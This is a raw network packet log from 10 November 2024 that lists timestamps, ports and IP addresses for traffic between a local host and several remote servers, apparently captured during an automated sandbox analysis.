Nov 10, 2024 04:55:24.331226110 CET	49852	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:24.331260920 CET	443	49852	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:24.331324100 CET	49852	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:24.331579924 CET	49852	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:24.331594944 CET	443	49852	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:24.367525101 CET	49827	443	192.168.2.5	20.189.173.17
Nov 10, 2024 04:55:24.387044907 CET	443	49835	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.387319088 CET	49835	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:24.387326002 CET	443	49835	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.387655020 CET	443	49835	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.387958050 CET	49835	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:24.388020039 CET	443	49835	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.388134956 CET	49835	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:24.407607079 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.407649040 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.407671928 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.407674074 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.407691002 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.407692909 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.407708883 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.407727957 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.407727957 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.407764912 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.407788038 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.407799006 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.407820940 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.407824039 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.407845974 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.407852888 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.407852888 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.407859087 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.407886982 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.407898903 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.407906055 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.407918930 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.407938004 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.407943964 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.407954931 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.407962084 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.407974005 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.407985926 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.407996893 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408010006 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408015013 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.408015013 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.408020020 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408050060 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408057928 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.408057928 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.408066034 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408078909 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408094883 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408107042 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.408138037 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.408180952 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408190966 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408215046 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408226013 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408235073 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408245087 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.408245087 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.408250093 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408283949 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.408286095 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408299923 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408305883 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.408310890 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408324957 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408330917 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.408338070 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408350945 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408360004 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.408360958 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408375978 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408381939 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.408401966 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.408410072 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408422947 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.408427954 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408440113 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408462048 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.408462048 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.408468962 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408480883 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408483028 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.408493042 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408504963 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.408524990 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408534050 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.408534050 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.408539057 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408550024 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408562899 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408567905 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.408584118 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408586979 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.408608913 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408618927 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408623934 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.408632040 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408643007 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408643961 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.408657074 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408663034 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.408673048 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408688068 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.408700943 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408710957 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.408715010 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408726931 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408739090 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408746958 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.408755064 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408778906 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408790112 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408791065 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.408802032 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408809900 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408809900 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.408818960 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408829927 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408842087 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408855915 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408857107 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.408870935 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.408874989 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408885956 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408911943 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.408911943 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.408914089 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408924103 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408936977 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408962965 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.408962965 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408962965 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.408983946 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.408989906 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.408994913 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.409009933 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.409018993 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.409023046 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.409048080 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.409048080 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.409061909 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.409073114 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.409075975 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.409085989 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.409096956 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.409097910 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.409111023 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.409137011 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.409140110 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.409140110 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.409148932 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.409162045 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.409178972 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.409188032 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.409198046 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.409200907 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.409214020 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.409226894 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.409230947 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.409230947 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.409240961 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.409251928 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.409260988 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.409260988 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.409265995 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.409291029 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.409291029 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.409332037 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.417017937 CET	49830	443	192.168.2.5	20.125.209.212
Nov 10, 2024 04:55:24.417026997 CET	443	49830	20.125.209.212	192.168.2.5
Nov 10, 2024 04:55:24.417037964 CET	49832	443	192.168.2.5	20.96.153.111
Nov 10, 2024 04:55:24.418471098 CET	49830	443	192.168.2.5	20.125.209.212
Nov 10, 2024 04:55:24.418509007 CET	443	49830	20.125.209.212	192.168.2.5
Nov 10, 2024 04:55:24.418565989 CET	49830	443	192.168.2.5	20.125.209.212
Nov 10, 2024 04:55:24.435336113 CET	443	49835	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.488729954 CET	443	49832	20.96.153.111	192.168.2.5
Nov 10, 2024 04:55:24.492227077 CET	443	49827	20.189.173.17	192.168.2.5
Nov 10, 2024 04:55:24.504434109 CET	49827	443	192.168.2.5	20.189.173.17
Nov 10, 2024 04:55:24.504467964 CET	443	49827	20.189.173.17	192.168.2.5
Nov 10, 2024 04:55:24.504568100 CET	443	49827	20.189.173.17	192.168.2.5
Nov 10, 2024 04:55:24.504633904 CET	49827	443	192.168.2.5	20.189.173.17
Nov 10, 2024 04:55:24.504646063 CET	49827	443	192.168.2.5	20.189.173.17
Nov 10, 2024 04:55:24.524516106 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.524530888 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.524542093 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.524599075 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.524632931 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.524686098 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.524702072 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.524714947 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.524727106 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.524744034 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.524744034 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.524746895 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.524763107 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.524775982 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.524782896 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.524796009 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.524801970 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.524808884 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.524820089 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.524826050 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.524832010 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.524852037 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.524856091 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.524879932 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.524889946 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.524900913 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.524908066 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.524931908 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.524941921 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.524941921 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.524945021 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.524960995 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.524983883 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.524991035 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525019884 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525022030 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.525037050 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525043964 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.525048971 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525062084 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525075912 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.525075912 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.525083065 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525100946 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525105953 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.525105953 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.525114059 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525126934 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525136948 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.525136948 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.525137901 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525152922 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525154114 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.525165081 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525177956 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525192976 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.525218964 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.525245905 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525257111 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.525259972 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525274992 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525291920 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525301933 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.525302887 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525330067 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525340080 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.525341034 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525352001 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525362968 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525376081 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525382042 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.525398970 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.525403023 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525413036 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.525413990 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525430918 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525444031 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525453091 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525465965 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525474072 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.525474072 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.525477886 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525489092 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525497913 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.525501966 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525526047 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.525527954 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525557041 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.525574923 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.525582075 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525593042 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525636911 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.525636911 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.525657892 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525671959 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525681973 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525707960 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525707960 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.525722027 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525732994 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525746107 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525748014 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.525748014 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.525754929 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525793076 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525794983 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.525794983 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.525804043 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525815010 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525826931 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525840044 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.525859118 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525863886 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.525872946 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525882959 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.525886059 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525895119 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.525897026 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525904894 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.525912046 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.525945902 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.525945902 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.525996923 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526007891 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526017904 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526031971 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526043892 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526051044 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.526057959 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526060104 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.526068926 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526093006 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.526097059 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526110888 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526114941 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.526120901 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526149988 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526156902 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.526156902 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.526164055 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526175022 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526184082 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.526187897 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526196957 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.526201010 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526216030 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.526232958 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.526232958 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526246071 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526249886 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.526262045 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526281118 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526289940 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.526289940 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.526295900 CET	80	49771	185.215.113.206	192.168.2.5
